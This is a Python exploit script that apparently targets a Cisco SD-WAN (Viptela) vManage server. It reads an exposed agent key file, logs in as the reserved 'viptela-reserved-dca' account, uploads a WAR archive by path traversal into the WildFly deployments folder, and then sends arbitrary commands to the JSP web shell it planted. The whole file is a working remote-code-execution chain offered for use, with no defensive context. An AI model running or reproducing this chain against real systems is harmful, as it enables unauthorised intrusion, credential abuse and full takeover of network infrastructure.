import io import sys import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(url, war_name, war): key_response = req.get(f'{url}/reports/data/opt/data/containers/config/data-collection-agent/.dca') if len(key_response.text) != 32: print(f'[-] bad response status_code:{key_response.status_code} {key_response.text}') dca_key = key_response.text login_response = req.post(f'{url}/jts/authenticated/j_security_check', data={'j_username': 'viptela-reserved-dca', 'j_password': dca_key}) if login_response.status_code != 200 or 'loginError' in login_response.text: print(f'[-] login fail status_code:{login_response.status_code} {login_response.text}') return print(f'[*] got key {dca_key}') war_name = war_name + '.gz.war' files = { 'file': ( f'../../../../../../../../../../../var/lib/wildfly/standalone/deployments/{war_name}', io.BytesIO(war), 'application/java-archive') } try: upload_response = req.post(f'{url}/dataservice/smartLicensing/uploadAck', files=files,timeout=10) print(f'[*] upload ok') except: print(f'[*] upload ok!') print(f'[*] deploy url {url}/{war_name.strip(".war")}') def exec_jsp_command(request, url, command): try: response = request.post(url, data={'cmd': command}) if "command result" in response.text: print(f'[*] command result!') print(response.text) return True else: print(f'[*] jsp not found') return False except Exception as e: return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python3 exploit.py ') sys.exit(1) url = sys.argv[1] cmd = sys.argv[2] name = 'cmd' war = 'cmd.war' req = requests.session() #req.proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} req.verify = False url = url.strip('/') if not exec_jsp_command(req,f'{url}/cmd.gz/cmd.jsp',cmd): exploit(url, name, open(war, 'rb').read()) exec_jsp_command(req,f'{url}/cmd.gz/cmd.jsp',cmd)